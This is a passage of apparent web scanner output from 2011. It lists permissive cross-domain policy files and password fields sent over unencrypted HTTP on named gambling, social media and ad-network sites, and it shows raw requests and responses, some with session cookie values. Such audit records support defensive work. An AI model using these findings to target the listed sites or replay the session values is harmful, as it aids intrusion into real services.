HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:41:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.svenskalotter |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.svenskalotter.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:41:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.youtube.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.youtube.com |
HTTP/1.0 200 OK Date: Mon, 16 May 2011 11:58:46 GMT Server: Apache Last-Modified: Fri, 13 May 2011 03:51:08 GMT ETag: "132-4a320373f0300" Accept-Ranges: bytes Content-Length: 306 Content-Type: application/xml <?xml version="1.0"?> <!-- http://www.youtube.com <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="s.ytimg.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://api.twitter.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: api.twitter.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:49:37 GMT Server: hi Status: 200 OK Last-Modified: Wed, 04 May 2011 17:32:26 GMT Content-Type: application/xml Content-Length: 561 Set-Cookie: k=173.193.214.243 Cache-Control: max-age=1800 Expires: Mon, 16 May 2011 13:19:37 GMT Vary: Accept-Encoding Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <allow-access-from domain="twitter.com" /> ...[SNIP]... <allow-access-from domain="search.twitter.com" /> <allow-access-from domain="static.twitter.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://casino.betsson |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: casino.betsson.com |
HTTP/1.1 200 OK Cache-Control: public Content-Type: text/xml Expires: Tue, 17 May 2011 03:41:40 GMT Last-Modified: Thu, 07 Apr 2011 10:52:45 GMT Accept-Ranges: bytes ETag: "1CBF511ED057C80" Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:14:16 GMT Connection: close Content-Length: 461 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain-po ...[SNIP]... <allow-access-from domain="cdn.betsson.com" secure="false"/> ...[SNIP]... <allow-access-from domain="betsson.hs.llnwd.net"/> <allow-access-from domain="ble.hs.llnwd.net"/> <allow-access-from domain="ble-cdn.betsson.com"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://games.betsson.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: games.betsson.com |
HTTP/1.1 200 OK Cache-Control: public Content-Type: text/xml Expires: Tue, 17 May 2011 03:48:30 GMT Last-Modified: Tue, 25 Jan 2011 13:39:02 GMT Accept-Ranges: bytes ETag: "1CBBC953A08DF00" Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:34:50 GMT Connection: close Content-Length: 633 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain-po ...[SNIP]... <allow-access-from domain="s-cdn.betsson.com" secure="true"/> ...[SNIP]... <allow-access-from domain="t-cdn.betsson.com" secure="true"/> ...[SNIP]... <allow-access-from domain="cdn.betsson.com" secure="false"/> ...[SNIP]... <allow-access-from domain="betsson.hs.llnwd.net" secure="true"/> ...[SNIP]... <allow-access-from domain="ble.hs.llnwd.net" secure="true"/> ...[SNIP]... <allow-access-from domain="ble-cdn.betsson.com" secure="true"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://livecasino |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: livecasino.betsson.com |
HTTP/1.1 200 OK Cache-Control: public Content-Type: text/xml Expires: Tue, 17 May 2011 03:30:39 GMT Last-Modified: Tue, 08 Feb 2011 12:00:55 GMT Accept-Ranges: bytes ETag: "1CBC787D6E47580" Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:10:22 GMT Connection: close Content-Length: 456 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain- ...[SNIP]... <allow-access-from domain="cdn.betsson.com"/> <allow-access-from domain="betsson.hs.llnwd.net"/> <allow-access-from domain="ble.hs.llnwd.net"/> <allow-access-from domain="ble-cdn.betsson.com"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://members.bet365.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: members.bet365.com |
HTTP/1.1 200 OK Connection: keep-alive Date: Mon, 16 May 2011 11:41:02 GMT X-Powered-By: ASP.NET Content-Length: 469 Content-Type: text/html Cache-control: private <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 ...[SNIP]... <allow-access-from domain="www.bet365.com" to-ports="443,80" secure="false" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://members.bet365 |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: members.bet365.com |
HTTP/1.1 200 OK Connection: keep-alive Date: Mon, 16 May 2011 12:34:11 GMT X-Powered-By: ASP.NET Content-Length: 469 Content-Type: text/html Cache-control: private <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 ...[SNIP]... <allow-access-from domain="www.bet365.com" to-ports="443,80" secure="false" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://poker.betsson.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: poker.betsson.com |
HTTP/1.1 200 OK Cache-Control: public Content-Type: text/xml Expires: Tue, 17 May 2011 03:46:34 GMT Last-Modified: Wed, 16 Feb 2011 11:20:42 GMT Accept-Ranges: bytes ETag: "1CBCDCB8BEFE100" Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:13:28 GMT Connection: close Content-Length: 548 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain-po ...[SNIP]... <allow-access-from domain="cdn.betsson.com"/> <allow-access-from domain="betsson.hs.llnwd.net"/> <allow-access-from domain="s-cdn.betsson.com"/> <allow-access-from domain="t-cdn.betsson.com"/> <allow-access-from domain="ble.hs.llnwd.net"/> <allow-access-from domain="ble-cdn.betsson.com"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://scratch.betsson |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: scratch.betsson.com |
HTTP/1.1 200 OK Cache-Control: public Content-Type: text/xml Expires: Tue, 17 May 2011 04:03:14 GMT Last-Modified: Mon, 14 Feb 2011 10:54:04 GMT Accept-Ranges: bytes ETag: "1CBCC357EA0EE00" Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:45:03 GMT Connection: close Content-Length: 343 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain-po ...[SNIP]... <allow-access-from domain="ble.hs.llnwd.net"/> <allow-access-from domain="ble-cdn.betsson.com"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://twitter.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: twitter.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 11:58:44 GMT Server: Apache Set-Cookie: k=173.193.214.243 Last-Modified: Wed, 04 May 2011 17:32:26 GMT Accept-Ranges: bytes Content-Length: 561 Cache-Control: max-age=1800 Expires: Mon, 16 May 2011 12:28:44 GMT Vary: Accept-Encoding X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Connection: close Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <al ...[SNIP]... <allow-access-from domain="api.twitter.com" /> <allow-access-from domain="search.twitter.com" /> <allow-access-from domain="static.twitter.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.norskelodd |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.norskelodd.com |
HTTP/1.1 200 OK Cache-Control: public Content-Type: text/xml Expires: Tue, 17 May 2011 08:39:44 GMT Last-Modified: Tue, 23 Nov 2010 15:48:12 GMT Accept-Ranges: bytes ETag: "1CB8B25D55EC600" Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:43:14 GMT Connection: close Content-Length: 394 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain-po ...[SNIP]... <allow-access-from domain="ws-cdn.ble.local"/> <allow-access-from domain="ble.hs.llnwd.net"/> <allow-access-from domain="www.norgesloddet.com"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad-emea.doubl |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad-emea.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT Date: Mon, 16 May 2011 11:41:05 GMT <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 19:54:04 GMT Date: Mon, 16 May 2011 12:49:31 GMT <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.scorecardresearch.com |
HTTP/1.0 200 OK Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT Content-Type: application/xml Expires: Tue, 17 May 2011 12:49:29 GMT Date: Mon, 16 May 2011 12:49:29 GMT Content-Length: 320 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resou ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s0.2mdn.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: s0.2mdn.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sun, 15 May 2011 12:20:21 GMT Expires: Sun, 15 May 2011 12:12:17 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 86106 Cache-Control: public, max-age=86400 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://secure-us |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: secure-us.imrworldwide |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:49:30 GMT Server: Apache Cache-Control: max-age=604800 Expires: Mon, 23 May 2011 12:49:30 GMT Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT ETag: "ff-4adbc4fc" Accept-Ranges: bytes Content-Length: 255 Connection: close Content-Type: application/xml <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </grant ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://spe.atdmt.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: spe.atdmt.com |
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 312 Allow: GET Expires: Sat, 21 May 2011 05:45:10 GMT Date: Mon, 16 May 2011 12:52:12 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://affiliates |
Path: | / |
GET / HTTP/1.1 Host: affiliates.interwetten Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:20:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 10237 Set-Cookie: BIGipServerPool Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... <body> <form name="aspnetForm" method="post" action="Default.aspx" id="aspnetForm"> <div> ...[SNIP]... </label> <input name="ctl00$txtPassword" type="password" id="ctl00_txtPassword" class="field" style="width:169px;" /> <input type="submit" name="ctl00$Button1" value="Login" id="ctl00_Button1" class="button1" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bingo.bet365.com |
Path: | /play/en/home/ |
GET /play/en/home/ HTTP/1.1 Host: bingo.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:35:26 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: bet365_Session=; path=/ Set-Cookie: stk=FE57C4F4DDFF44ED Set-Cookie: session=stk=FE57C4F4 Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:35:26 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:35:26 GMT; path=/ Set-Cookie: LandingVisited=True; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:35:26 GMT Content-Type: text/html; charset=utf-8 Content-Length: 130943 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> Bingo at bet36 ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/play/en/home <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh <a onclick="if (CreateLoginProcess('', '%2fplay%2fen%2fhome%2f', '', false, this.id)) { SetHiddenPassword(" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://casino.bet365.com |
Path: | /extra/en/online-games |
GET /extra/en/online-games Host: casino.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:32:25 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: bet365_Session=; path=/ Set-Cookie: stk=738A9FB42BA343DA Set-Cookie: session=stk=738A9FB4 Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:25 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:25 GMT; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:32:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 88186 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_Html" xmlns="http://www.w3.org <head id=" ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/extra/en/online <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://casino.bet365.com |
Path: | /extra/en/online-games |
GET /extra/en/online-games Host: casino.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:32:24 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: bet365_Session=; path=/ Set-Cookie: stk=A71662CB8A884A4A Set-Cookie: session=stk=A71662CB Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:23 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:23 GMT; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:32:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 86154 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_Html" xmlns="http://www.w3.org <head id=" ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/extra/en/online <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://casino.bet365.com |
Path: | /extra/en/online-games |
GET /extra/en/online-games Host: casino.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:32:25 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: bet365_Session=; path=/ Set-Cookie: stk=AE7AAAF18ED44B4C Set-Cookie: session=stk=AE7AAAF1 Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:25 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:25 GMT; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:32:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 93559 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_Html" xmlns="http://www.w3.org <head id=" ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/extra/en/online <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://casino.bet365.com |
Path: | /extra/en/online-games |
GET /extra/en/online-games Host: casino.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:32:24 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: bet365_Session=; path=/ Set-Cookie: stk=08ACA4CA6B6B4BC3 Set-Cookie: session=stk=08ACA4CA Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:24 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:24 GMT; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:32:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 85710 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_Html" xmlns="http://www.w3.org <head id=" ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/extra/en/online <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://casino.bet365.com |
Path: | /home/en/ |
GET /home/en/ HTTP/1.1 Host: casino.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:32:23 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: bet365_Session=; path=/ Set-Cookie: stk=840278C39B9946C1 Set-Cookie: session=stk=840278C3 Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:22 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:22 GMT; path=/ Set-Cookie: LandingVisited=True; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:32:23 GMT Content-Type: text/html; charset=utf-8 Content-Length: 227712 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><t ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/home/en/Default <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh <a onclick="if (CreateLoginProcess('', '%2fhome%2fen%2f', '', false, this.id)) { SetHiddenPassword(" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://games.bet365.com |
Path: | /home/en/ |
GET /home/en/ HTTP/1.1 Host: games.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:02:20 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: bet365_Session=; path=/ Set-Cookie: stk=7FFFF94400DA44DB Set-Cookie: session=stk=7FFFF944 Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:02:19 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:02:19 GMT; path=/ Set-Cookie: LandingVisited=True; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:02:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 338090 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><t ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/home/en/Default <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh <a onclick="if (CreateLoginProcess('', '%2fhome%2fen%2f', '', false, this.id)) { SetHiddenPassword(" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://poker.bet365.com |
Path: | /home/en/ |
GET /home/en/ HTTP/1.1 Host: poker.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:20:32 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: bet365_Session=; path=/ Set-Cookie: stk=21BAFE3BE630423E Set-Cookie: session=stk=21BAFE3B Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:20:32 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:20:32 GMT; path=/ Set-Cookie: LandingVisited=True; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:20:32 GMT Content-Type: text/html; charset=utf-8 Content-Length: 102583 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><t ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/home/en/Default <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh <a onclick="if (CreateLoginProcess('', '%2fhome%2fen%2f', '', false, this.id)) { SetHiddenPassword(" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bet365.com |
Path: | /extra/en/betting/in-play |
GET /extra/en/betting/in-play HTTP/1.1 Host: www.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:31:22 GMT X-AspNet-Version: 2.0.50727 Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:22 GMT; path=/ Set-Cookie: ASP.NET_SessionId Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:22 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:22 GMT; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:31:22 GMT Content-Type: text/html; charset=utf-8 Content-Length: 102612 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_Html" xmlns="http://www.w3.org <head id=" ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/extra/en/betting <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bet365.com |
Path: | /extra/en/betting/live |
GET /extra/en/betting/live Host: www.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:31:24 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:23 GMT; path=/ Set-Cookie: ASP.NET_SessionId Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:23 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:23 GMT; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:31:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 101179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_Html" xmlns="http://www.w3.org <head id=" ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/extra/en/betting <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bet365.com |
Path: | /extra/en/mobile |
GET /extra/en/mobile Host: www.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D |
